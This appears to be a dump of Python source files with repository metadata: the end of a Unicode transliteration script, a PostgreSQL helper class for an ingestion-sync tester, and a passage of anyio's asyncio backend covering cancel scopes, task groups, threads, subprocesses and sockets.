    parser.add_argument("--unicode-data-file", help="Path to formatted text file corresponding to UnicodeData.txt.", type=str, required=True, dest='unicodeDataFilePath')
    parser.add_argument("--latin-ascii-file", help="Path to XML file from Unicode Common Locale Data Repository (CLDR) corresponding to Latin-ASCII transliterator (Latin-ASCII.xml).", type=str, dest='latinAsciiFilePath')
    parser.add_argument("--no-ligatures-expansion", help="Do not expand ligatures and do not use Unicode CLDR Latin-ASCII transliterator. By default, this option is not enabled and \"--latin-ascii-file\" argument is required. If this option is enabled, \"--latin-ascii-file\" argument is optional and ignored.", action="store_true", dest='noLigaturesExpansion')
    args = parser.parse_args()

    if args.noLigaturesExpansion is False and args.latinAsciiFilePath is None:
        sys.stderr.write('You must specify the path to Latin-ASCII transliterator file with \"--latin-ascii-file\" option or use \"--no-ligatures-expansion\" option. Use \"-h\" option for help.')
        sys.exit(1)

    main(args)
| 44.70068 | 361 | 0.68574 |
acfb4f689d5a1ec718d1e7d4ad0ac3cf648b3a28 | 8,981 | py | Python | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | """
This module wrapping and provide easy access client for ingestion-sync functionality on postgres
"""
import logging
from sync_tester.configuration import config
from mc_automation_tools import postgres
_log = logging.getLogger('sync_tester.postgres.postgres_adapter')
class PostgresHandler:
    """Convenience wrapper over the ingestion/sync PostgreSQL databases.

    Holds connection parameters for the job/task (job manager), pycsw records,
    mapproxy config and agent databases, and exposes query and cleanup helpers
    used by the sync tester.
    """

    def __init__(self, pg_credential):
        # pg_credential is expected to expose the pg_* attributes read below
        self.__end_point_url = pg_credential.pg_entrypoint_url
        self.__port = pg_credential.pg_port
        self.__user = pg_credential.pg_user
        self.__password = pg_credential.pg_pass
        self.__job_task_db = pg_credential.pg_job_task_db
        self.__pycsw_records_db = pg_credential.pg_pycsw_record_db
        self.__mapproxy_config_db = pg_credential.pg_mapproxy_db
        self.__agent_db = pg_credential.pg_agent_db
        self.__mapproxy_config_table = 'config'

    @property
    def get_class_params(self):
        # Snapshot of the connection parameters (credentials excluded), mainly
        # for logging/debugging purposes.
        params = {
            '__end_point_url': self.__end_point_url,
            '__port': self.__port,
            '__job_task_db': self.__job_task_db,
            '__pycsw_records_db': self.__pycsw_records_db,
            '__mapproxy_config_db': self.__mapproxy_config_db,
            '__agent_db': self.__agent_db,
            '__mapproxy_config_table': self.__mapproxy_config_table
        }
        return params

    # ============================================== jobs & task =======================================================
    def get_current_job_id(self, product_id, product_version):
        """
        Return the latest job id (ordered by creationTime, descending) for the
        provided product id and product version.
        :param product_id: resource id
        :param product_version: layer version
        :return: str - job id
        """
        client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
        keys_values = {'resourceId': product_id, 'version': product_version}
        res = client.get_rows_by_keys('Job', keys_values, order_key='creationTime', order_desc=True)
        # First row is the newest; column 0 is the job id, column 6 its creation time
        latest_job_id = res[0][0]
        _log.info(f'Received current job id: [{latest_job_id}], from date: {res[0][6]}')
        return latest_job_id

    def get_job_by_id(self, job_id):
        """
        This method return job by providing id (jobId)
        :param job_id: id of relevant job
        :return: dict of job data
        """
        client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
        res = client.get_rows_by_keys('Job', {'id': job_id}, return_as_dict=True)
        return res[0]

    def get_tasks_by_job(self, job_id):
        """
        This method return list of tasks [rows] by provided job id [jobId]
        :param job_id: id of relevant job
        :return: list of dicts, one per task
        """
        client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
        res = client.get_rows_by_keys('Task', {'jobId': job_id}, return_as_dict=True)
        return res

    def clean_layer_history(self, job_id):
        """
        This method will delete record of job on agent db -> in case user wants to ingest
        the same layer again from the watch dir.
        :param job_id: id of relevant job
        :return: dict -> {'status': 'OK'|'Failed', 'message': str}
        """
        # NOTE(review): job_id is interpolated into the SQL directly; fine for trusted
        # test input, but parameterize if this is ever fed untrusted data.
        deletion_command = f"""DELETE FROM "layer_history" WHERE "layerId"='{job_id}';"""
        client = postgres.PGClass(self.__end_point_url, self.__agent_db, self.__user, self.__password, self.__port)
        try:
            client.command_execute([deletion_command])
            _log.info(f'Cleaned up successfully (layer_history) - from [{self.__agent_db}] , job: [{job_id}]')
            return {'status': "OK", 'message': f'deleted ok {job_id}'}
        except Exception as e:
            return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}

    def clean_job_task(self, job_id):
        """
        This method will delete record of job on job task db [job manager db] -> deletion of job on Jobs table
        and related tasks on Tasks table
        :param job_id: id of relevant job
        :return: dict -> {'status': 'OK'|'Failed', 'message': str}
        """
        # Tasks are removed first to avoid orphaning rows referencing the job
        deletion_command = f"""DELETE FROM "Task" WHERE "jobId"='{job_id}';DELETE FROM "Job" WHERE "id"='{job_id}';"""
        client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
        try:
            client.command_execute([deletion_command])
            _log.info(f'Cleaned up successfully (job + task)- [{self.__job_task_db}] job: [{job_id}]')
            return {'status': "OK", 'message': f'deleted ok {job_id}'}
        except Exception as e:
            return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}

    # ========================================== catalog - pycsw =======================================================
    def clean_pycsw_record(self, product_id):
        """
        This method will delete record of layer on pycsw db -> its unique record
        :param product_id: layer id -> resourceId
        :return: dict -> {'status': 'OK'|'Failed', 'message': str}
        """
        deletion_command = f"""DELETE FROM "records" WHERE "product_id"='{product_id}'"""
        client = postgres.PGClass(self.__end_point_url, self.__pycsw_records_db, self.__user, self.__password,
                                  self.__port)
        try:
            client.command_execute([deletion_command])
            _log.info(
                f'Cleaned up successfully (record pycsw) - from [{self.__pycsw_records_db}] , records: [{product_id}]')
            return {'status': "OK", 'message': f'deleted ok {product_id}'}
        except Exception as e:
            return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}

    # =============================================== mapproxy =========================================================
    def get_mapproxy_config(self):
        """
        This method will return current configuration of layer on mapproxy config db
        :return: dict -> {'status': 'OK'|'Failed', 'message': config json or error str}
        """
        client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
                                  self.__port)
        try:
            # Only the first "data" cell is returned; presumably the latest config row
            res = client.get_column_by_name(table_name='config', column_name="data")[0]
            _log.info(f'got json-config ok')
            return {'status': "OK", 'message': res}
        except Exception as e:
            return {'status': "Failed", 'message': f'Failed get json-config: [{str(e)}]'}

    def get_mapproxy_configs(self):
        """
        This will return all mapproxy configuration rows, newest first
        (ordered by updated_time, descending).
        :return: list of dicts
        """
        client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
                                  self.__port)
        res = client.get_rows_by_order(table_name=self.__mapproxy_config_table, order_key='updated_time',
                                       order_desc=True,
                                       return_as_dict=True)
        _log.info(f'Received {len(res)} of mapproxy config files')
        return res

    def delete_config_mapproxy(self, id, value):
        """
        This method will delete an entire row from the mapproxy config table
        :param id: id column of the specific configuration row
        :param value: value to match for that id column
        :return: dict -> {'status': 'OK'|'Failed', 'message': str}
        """
        client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
                                  self.__port)
        try:
            res = client.delete_row_by_id(self.__mapproxy_config_table, id, value)
            _log.info(f'delete mapproxy config with id [{id}] successfully')
            return {'status': "OK", 'message': res}
        except Exception as e:
            return {'status': "Failed", 'message': f'Failed on deletion json-config: [{str(e)}]'}
def delete_pycsw_record(product_id, value, db_name=config.PG_PYCSW_RECORD_DB_CORE_A, table_name='records'):
    """
    Delete a layer's row from the pycsw records table (core A credentials).

    :param product_id: id column to match on (the layer's product_id)
    :param value: value of the product_id to delete
    :param db_name: name of db
    :param table_name: name of table
    """
    client = postgres.PGClass(config.PG_HOST, db_name, config.PG_USER_CORE_A, config.PG_PASS_CORE_A)
    # Return value intentionally discarded: callers only care that the row is gone
    client.delete_row_by_id(table_name, product_id, value)
def delete_agent_path(layer_id, value, db_name=config.PG_AGENT_DB_CORE_A, table_name='layer_history'):
    """
    Delete a layer's row from the agent's layer_history table (core A credentials).

    :param layer_id: id column to match on (the layer's unique ID)
    :param value: value of the layer id to delete
    :param db_name: name of db
    :param table_name: name of table
    """
    client = postgres.PGClass(config.PG_HOST, db_name, config.PG_USER_CORE_A, config.PG_PASS_CORE_A)
    # Return value intentionally discarded: callers only care that the row is gone
    client.delete_row_by_id(table_name, layer_id, value)
| 45.588832 | 120 | 0.619419 |
acfb4f68d6f7cb6e3f93d3b65d68a2b6a603ae28 | 42,775 | py | Python | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Callable, Set, Optional, Union, Tuple, cast, Coroutine, Any, Awaitable, TypeVar, Generator,
List, Dict, Sequence, Type, Deque)
from weakref import WeakKeyDictionary
from .. import abc, TaskInfo
from .._core._eventloop import threadlocals, claim_worker_thread
from .._core._exceptions import (
ExceptionGroup as BaseExceptionGroup, ClosedResourceError, BusyResourceError, WouldBlock,
BrokenResourceError, EndOfStream)
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
# On Python 3.7+ the needed asyncio entry points exist natively; on older
# versions equivalent backports are defined below.
if sys.version_info >= (3, 7):
    from asyncio import create_task, get_running_loop, current_task, all_tasks, run as native_run
    from contextlib import asynccontextmanager
else:
    from async_generator import asynccontextmanager

    _T = TypeVar('_T')

    def native_run(main, *, debug=False):
        """Backport of asyncio.run() for Python < 3.7."""
        # Snatched from Python 3.7
        from asyncio import coroutines
        from asyncio import events
        from asyncio import tasks

        def _cancel_all_tasks(loop):
            # Cancel all outstanding tasks and report any exceptions they hold
            to_cancel = all_tasks(loop)
            if not to_cancel:
                return

            for task in to_cancel:
                task.cancel()

            loop.run_until_complete(
                tasks.gather(*to_cancel, loop=loop, return_exceptions=True))

            for task in to_cancel:
                if task.cancelled():
                    continue
                if task.exception() is not None:
                    loop.call_exception_handler({
                        'message': 'unhandled exception during asyncio.run() shutdown',
                        'exception': task.exception(),
                        'task': task,
                    })

        if events._get_running_loop() is not None:
            raise RuntimeError(
                "asyncio.run() cannot be called from a running event loop")

        if not coroutines.iscoroutine(main):
            raise ValueError("a coroutine was expected, got {!r}".format(main))

        loop = events.new_event_loop()
        try:
            events.set_event_loop(loop)
            loop.set_debug(debug)
            return loop.run_until_complete(main)
        finally:
            try:
                _cancel_all_tasks(loop)
                loop.run_until_complete(loop.shutdown_asyncgens())
            finally:
                events.set_event_loop(None)
                loop.close()

    def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *,  # type: ignore
                    name: Optional[str] = None) -> asyncio.Task:
        # "name" is accepted for API parity with 3.8+, but ignored here
        return get_running_loop().create_task(coro)

    def get_running_loop() -> asyncio.AbstractEventLoop:
        loop = asyncio._get_running_loop()
        if loop is not None:
            return loop
        else:
            raise RuntimeError('no running event loop')

    def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
        """Return a set of all tasks for the loop."""
        from asyncio import Task

        if loop is None:
            loop = get_running_loop()

        return {t for t in Task.all_tasks(loop) if not t.done()}

    def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
        if loop is None:
            loop = get_running_loop()

        return asyncio.Task.current_task(loop)
# Generic return-type variable used across this backend's wrappers
T_Retval = TypeVar('T_Retval')

# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
    """Return the dotted ``module.qualname`` path of *func* (best effort)."""
    parts = (getattr(func, '__module__', None), getattr(func, '__qualname__', None))
    return '.'.join(part for part in parts if part)
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
                                 use_uvloop: bool) -> None:
    """Install *policy* as the global event loop policy, falling back to uvloop
    when no policy was given and uvloop is usable."""
    # On CPython, use uvloop when possible if no other policy has been given and if not
    # explicitly disabled
    if policy is None and use_uvloop and sys.implementation.name == 'cpython':
        try:
            import uvloop
        except ImportError:
            pass
        else:
            # Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
            if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
                    or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
                policy = uvloop.EventLoopPolicy()

    if policy is not None:
        asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
        policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
    """Run ``func(*args)`` on a fresh event loop and return its result.

    The root task is registered in ``_task_states`` so cancel scopes and task
    introspection work for it, and its state is removed again on exit.
    """
    @wraps(func)
    async def wrapper():
        task = current_task()
        task_state = TaskState(None, get_callable_name(func), None)
        _task_states[task] = task_state
        if _native_task_names:
            task.set_name(task_state.name)

        try:
            return await func(*args)
        finally:
            del _task_states[task]

    _maybe_set_event_loop_policy(policy, use_uvloop)
    return native_run(wrapper(), debug=debug)
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
    """Sleep for *delay* seconds, first giving pending cancellation a chance
    to be delivered via checkpoint()."""
    await checkpoint()
    await asyncio.sleep(delay)
#
# Timeouts and cancellation
#
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
    """Asyncio implementation of the AnyIO cancel scope.

    Tracks the tasks running within it and delivers cancellation to them,
    honouring shielding and an optional deadline.
    """

    __slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
                 '_timeout_task', '_tasks', '_host_task', '_timeout_expired')

    def __init__(self, deadline: float = math.inf, shield: bool = False):
        self._deadline = deadline
        self._shield = shield
        self._parent_scope: Optional[CancelScope] = None
        self._cancel_called = False
        self._active = False
        self._timeout_task: Optional[asyncio.Task] = None
        self._tasks: Set[asyncio.Task] = set()
        self._host_task: Optional[asyncio.Task] = None
        self._timeout_expired = False

    async def __aenter__(self):
        async def timeout():
            # Sleep until the deadline, then flag expiry and cancel the scope
            await asyncio.sleep(self._deadline - get_running_loop().time())
            self._timeout_expired = True
            await self.cancel()

        if self._active:
            raise RuntimeError(
                "Each CancelScope may only be used for a single 'async with' block"
            )

        self._host_task = current_task()
        self._tasks.add(self._host_task)
        try:
            task_state = _task_states[self._host_task]
        except KeyError:
            # First scope entered by this task: create its state record
            task_name = self._host_task.get_name() if _native_task_names else None
            task_state = TaskState(None, task_name, self)
            _task_states[self._host_task] = task_state
        else:
            # Nest under the task's current innermost scope
            self._parent_scope = task_state.cancel_scope
            task_state.cancel_scope = self

        if self._deadline != math.inf:
            if get_running_loop().time() >= self._deadline:
                # Deadline already passed: mark as cancelled right away
                self._cancel_called = True
                self._timeout_expired = True
            else:
                self._timeout_task = get_running_loop().create_task(timeout())

        self._active = True
        return self

    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> Optional[bool]:
        self._active = False
        if self._timeout_task:
            self._timeout_task.cancel()

        assert self._host_task is not None
        self._tasks.remove(self._host_task)
        host_task_state = _task_states.get(self._host_task)
        if host_task_state is not None and host_task_state.cancel_scope is self:
            # Restore the parent scope as the task's innermost scope
            host_task_state.cancel_scope = self._parent_scope

        if exc_val is not None:
            exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
            if all(isinstance(exc, CancelledError) for exc in exceptions):
                # Swallow the cancellation if it originated in this scope
                if self._timeout_expired:
                    return True
                elif not self._parent_cancelled():
                    # This scope was directly cancelled
                    return True

        return None

    async def _cancel(self):
        # Deliver cancellation to directly contained tasks and nested cancel scopes
        for task in self._tasks:
            # Cancel the task directly, but only if it's blocked and isn't within a shielded scope
            cancel_scope = _task_states[task].cancel_scope
            if cancel_scope is self:
                # Only deliver the cancellation if the task is already running (but not this task!)
                try:
                    # Coroutine attributes (cr_*); generator-based coroutines use gi_*
                    running = task._coro.cr_running
                    awaitable = task._coro.cr_await
                except AttributeError:
                    running = task._coro.gi_running
                    awaitable = task._coro.gi_yieldfrom

                if not running and awaitable is not None:
                    task.cancel()
            elif not cancel_scope._shielded_to(self):
                await cancel_scope._cancel()

    def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
        # Check whether this task or any parent up to (but not including) the "parent" argument is
        # shielded
        cancel_scope: Optional[CancelScope] = self
        while cancel_scope is not None and cancel_scope is not parent:
            if cancel_scope._shield:
                return True
            else:
                cancel_scope = cancel_scope._parent_scope

        return False

    def _parent_cancelled(self) -> bool:
        # Check whether any parent has been cancelled
        cancel_scope = self._parent_scope
        while cancel_scope is not None and not cancel_scope._shield:
            if cancel_scope._cancel_called:
                return True
            else:
                cancel_scope = cancel_scope._parent_scope

        return False

    async def cancel(self) -> None:
        """Cancel this scope (idempotent)."""
        if self._cancel_called:
            return

        self._cancel_called = True
        await self._cancel()

    @property
    def deadline(self) -> float:
        return self._deadline

    @property
    def cancel_called(self) -> bool:
        return self._cancel_called

    @property
    def shield(self) -> bool:
        return self._shield
async def checkpoint():
    """Raise CancelledError if any enclosing unshielded scope was cancelled,
    then yield control to the event loop once."""
    try:
        cancel_scope = _task_states[current_task()].cancel_scope
    except KeyError:
        cancel_scope = None

    while cancel_scope:
        if cancel_scope.cancel_called:
            raise CancelledError
        elif cancel_scope.shield:
            # A shielded scope blocks cancellation coming from its ancestors
            break
        else:
            cancel_scope = cancel_scope._parent_scope

    await asyncio.sleep(0)
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
    """Async context manager raising TimeoutError if the block exceeds *delay* seconds."""
    deadline = get_running_loop().time() + delay
    async with CancelScope(deadline, shield) as scope:
        yield scope

    if scope._timeout_expired:
        raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
    """Async context manager that silently cancels the block after *delay* seconds."""
    deadline = get_running_loop().time() + delay
    async with CancelScope(deadline=deadline, shield=shield) as scope:
        yield scope
async def current_effective_deadline():
    """Return the nearest deadline among the task's cancel scopes, stopping at
    the first shielded scope (its ancestors cannot affect the task)."""
    deadline = math.inf
    cancel_scope = _task_states[current_task()].cancel_scope
    while cancel_scope:
        deadline = min(deadline, cancel_scope.deadline)
        if cancel_scope.shield:
            break
        else:
            cancel_scope = cancel_scope._parent_scope

    return deadline
async def current_time():
    """Return the running event loop's monotonic clock value."""
    return get_running_loop().time()
#
# Task states
#
class TaskState:
    """
    Encapsulates auxiliary task information that cannot be added to the Task instance itself
    because there are no guarantees about its implementation.
    """

    __slots__ = 'parent_id', 'name', 'cancel_scope'

    def __init__(self, parent_id: Optional[int], name: Optional[str],
                 cancel_scope: Optional[CancelScope]):
        self.parent_id = parent_id
        self.name = name
        self.cancel_scope = cancel_scope


# Weak keys so a finished task's state is dropped together with the task object
_task_states = WeakKeyDictionary()  # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
    """Raised when more than one task in a task group fails."""

    def __init__(self, exceptions: Sequence[BaseException]):
        super().__init__()
        self.exceptions = exceptions
class TaskGroup(abc.TaskGroup):
    """Asyncio implementation of the AnyIO task group.

    Child tasks spawned via :meth:`spawn` share this group's cancel scope;
    exiting the ``async with`` block waits for all of them and re-raises
    their exceptions (wrapped in ExceptionGroup if more than one).
    """

    __slots__ = 'cancel_scope', '_active', '_exceptions'

    def __init__(self):
        self.cancel_scope: CancelScope = CancelScope()
        self._active = False
        self._exceptions: List[BaseException] = []

    async def __aenter__(self):
        await self.cancel_scope.__aenter__()
        self._active = True
        return self

    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> Optional[bool]:
        ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
        if exc_val is not None:
            # The host block raised: cancel all children before waiting on them
            await self.cancel_scope.cancel()
            if not ignore_exception:
                self._exceptions.append(exc_val)

        while self.cancel_scope._tasks:
            try:
                await asyncio.wait(self.cancel_scope._tasks)
            except asyncio.CancelledError:
                await self.cancel_scope.cancel()

        self._active = False
        if not self.cancel_scope._parent_cancelled():
            # Drop the redundant CancelledErrors produced by this scope's own cancellation
            exceptions = self._filter_cancellation_errors(self._exceptions)
        else:
            exceptions = self._exceptions

        try:
            if len(exceptions) > 1:
                raise ExceptionGroup(exceptions)
            elif exceptions and exceptions[0] is not exc_val:
                raise exceptions[0]
        except BaseException as exc:
            # Clear the context here, as it can only be done in-flight.
            # If the context is not cleared, it can result in recursive tracebacks (see #145).
            exc.__context__ = None
            raise

        return ignore_exception

    @staticmethod
    def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
        """Recursively strip CancelledErrors, collapsing single-child groups."""
        filtered_exceptions: List[BaseException] = []
        for exc in exceptions:
            if isinstance(exc, ExceptionGroup):
                exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
                if exc.exceptions:
                    if len(exc.exceptions) > 1:
                        filtered_exceptions.append(exc)
                    else:
                        filtered_exceptions.append(exc.exceptions[0])
            elif not isinstance(exc, CancelledError):
                filtered_exceptions.append(exc)

        return filtered_exceptions

    async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
        # Wrapper running in the child task: collect failures and trigger group cancellation
        task = cast(asyncio.Task, current_task())
        try:
            await func(*args)
        except BaseException as exc:
            self._exceptions.append(exc)
            await self.cancel_scope.cancel()
        finally:
            self.cancel_scope._tasks.remove(task)
            del _task_states[task]  # type: ignore

    async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
        """Start a child task running ``func(*args)`` within this group's cancel scope."""
        if not self._active:
            raise RuntimeError('This task group is not active; no new tasks can be spawned.')

        name = name or get_callable_name(func)
        # BUGFIX: was "if _native_task_names is None:", which is always False because
        # _native_task_names is a bool — the task name was never forwarded. Pass the
        # name to create_task() whenever asyncio supports it (Python 3.8+).
        if _native_task_names:
            task = create_task(self._run_wrapped_task(func, args), name=name)  # type: ignore
        else:
            task = create_task(self._run_wrapped_task(func, args))

        # Make the spawned task inherit the task group's cancel scope
        _task_states[task] = TaskState(parent_id=id(current_task()), name=name,
                                       cancel_scope=self.cancel_scope)
        self.cancel_scope._tasks.add(task)
#
# Threads
#
# (result, exception) pairs passed back from the worker thread; exactly one is non-None
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]


async def run_sync_in_worker_thread(
        func: Callable[..., T_Retval], *args, cancellable: bool = False,
        limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
    """Run ``func(*args)`` in a daemon worker thread and await its result.

    :param cancellable: if False, the await is shielded so cancellation cannot
        abandon a running thread mid-way
    :param limiter: capacity limiter bounding concurrent worker threads
        (defaults to the module-level ``_default_thread_limiter``)
    """
    def thread_worker():
        # Runs in the worker thread; results are marshalled back via the loop
        try:
            with claim_worker_thread('asyncio'):
                threadlocals.loop = loop
                result = func(*args)
        except BaseException as exc:
            if not loop.is_closed():
                asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
                if not cancelled:
                    loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
        else:
            if not loop.is_closed():
                asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
                if not cancelled:
                    loop.call_soon_threadsafe(queue.put_nowait, (result, None))

    await checkpoint()
    loop = get_running_loop()
    task = current_task()
    queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
    cancelled = False
    limiter = limiter or _default_thread_limiter
    await limiter.acquire_on_behalf_of(task)
    thread = Thread(target=thread_worker, daemon=True)
    thread.start()
    async with CancelScope(shield=not cancellable):
        try:
            retval, exception = await queue.get()
        finally:
            # Tell the worker not to post its result once we have stopped waiting
            cancelled = True

    if exception is not None:
        raise exception
    else:
        return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
    """Run a coroutine function on the portal event loop from a worker thread.

    Blocks the calling thread until the coroutine finishes, then returns its
    result (or re-raises its exception).
    """
    coro = func(*args)
    future: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
        coro, threadlocals.loop)
    return future.result()
class BlockingPortal(abc.BlockingPortal):
    """Asyncio blocking portal: lets foreign threads submit work to the loop.

    The running loop is captured at construction time so later calls from
    other threads know which loop to target.
    """
    __slots__ = '_loop'
    def __init__(self):
        super().__init__()
        self._loop = get_running_loop()
    def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
        # Called from a foreign thread: hop onto the portal's event loop.
        asyncio.run_coroutine_threadsafe(
            self._task_group.spawn(self._call_func, func, args, future), self._loop)
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
    """Adapts an asyncio.StreamReader to the ByteReceiveStream interface."""
    # Underlying asyncio reader for the subprocess pipe.
    _stream: asyncio.StreamReader
    async def receive(self, max_bytes: int = 65536) -> bytes:
        data = await self._stream.read(max_bytes)
        # An empty read means the peer closed the stream.
        if data:
            return data
        else:
            raise EndOfStream
    async def aclose(self) -> None:
        self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
    """Adapts an asyncio.StreamWriter to the ByteSendStream interface."""
    # Underlying asyncio writer for the subprocess pipe.
    _stream: asyncio.StreamWriter
    async def send(self, item: bytes) -> None:
        self._stream.write(item)
        # drain() applies write backpressure.
        await self._stream.drain()
    async def aclose(self) -> None:
        self._stream.close()
@dataclass
class Process(abc.Process):
    """Wraps an asyncio subprocess, exposing its pipes as anyio byte streams."""
    _process: asyncio.subprocess.Process
    _stdin: Optional[abc.ByteSendStream]
    _stdout: Optional[abc.ByteReceiveStream]
    _stderr: Optional[abc.ByteReceiveStream]
    async def aclose(self) -> None:
        # Close all pipes first, then wait for the process to exit.
        if self._stdin:
            await self._stdin.aclose()
        if self._stdout:
            await self._stdout.aclose()
        if self._stderr:
            await self._stderr.aclose()
        await self.wait()
    async def wait(self) -> int:
        return await self._process.wait()
    def terminate(self) -> None:
        self._process.terminate()
    def kill(self) -> None:
        self._process.kill()
    def send_signal(self, signal: int) -> None:
        self._process.send_signal(signal)
    @property
    def pid(self) -> int:
        return self._process.pid
    @property
    def returncode(self) -> Optional[int]:
        # None while the process is still running.
        return self._process.returncode
    @property
    def stdin(self) -> Optional[abc.ByteSendStream]:
        return self._stdin
    @property
    def stdout(self) -> Optional[abc.ByteReceiveStream]:
        return self._stdout
    @property
    def stderr(self) -> Optional[abc.ByteReceiveStream]:
        return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
    """Spawn a subprocess and wrap its pipes in anyio stream adapters.

    ``command`` is a shell string when ``shell`` is true, otherwise an argv
    sequence.  The stdio arguments are subprocess constants (PIPE etc.).
    """
    await checkpoint()
    if shell:
        process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
                                                        stderr=stderr)
    else:
        process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
                                                       stderr=stderr)
    # Pipes not requested with PIPE come back as None; mirror that here.
    stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
    stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
    stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
    return Process(process, stdin_stream, stdout_stream, stderr_stream)
#
# Sockets and networking
#
# One pending wait event per socket; a present entry marks the socket as busy
# for wait_socket_readable()/wait_socket_writable().
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
    """Protocol backing SocketStream: buffers reads, signals via events.

    ``read_event`` is set whenever data arrives, EOF is received, or the
    connection is lost; ``write_event`` reflects transport flow control.
    """
    read_queue: Deque[bytes]
    read_event: asyncio.Event
    write_event: asyncio.Event
    # Set by connection_lost() when the connection failed.
    exception: Optional[Exception] = None
    def connection_made(self, transport: asyncio.BaseTransport) -> None:
        self.read_queue = deque()
        self.read_event = asyncio.Event()
        self.write_event = asyncio.Event()
        self.write_event.set()
        # Zero buffer limit so pause_writing()/resume_writing() fire eagerly.
        cast(asyncio.Transport, transport).set_write_buffer_limits(0)
    def connection_lost(self, exc: Optional[Exception]) -> None:
        self.exception = exc
        # Wake any pending readers/writers so they can observe the loss.
        self.read_event.set()
        self.write_event.set()
    def data_received(self, data: bytes) -> None:
        self.read_queue.append(data)
        self.read_event.set()
    def eof_received(self) -> Optional[bool]:
        self.read_event.set()
        return None
    def pause_writing(self) -> None:
        self.write_event.clear()
    def resume_writing(self) -> None:
        self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
    """Protocol backing UDP sockets: queues datagrams with sender addresses."""
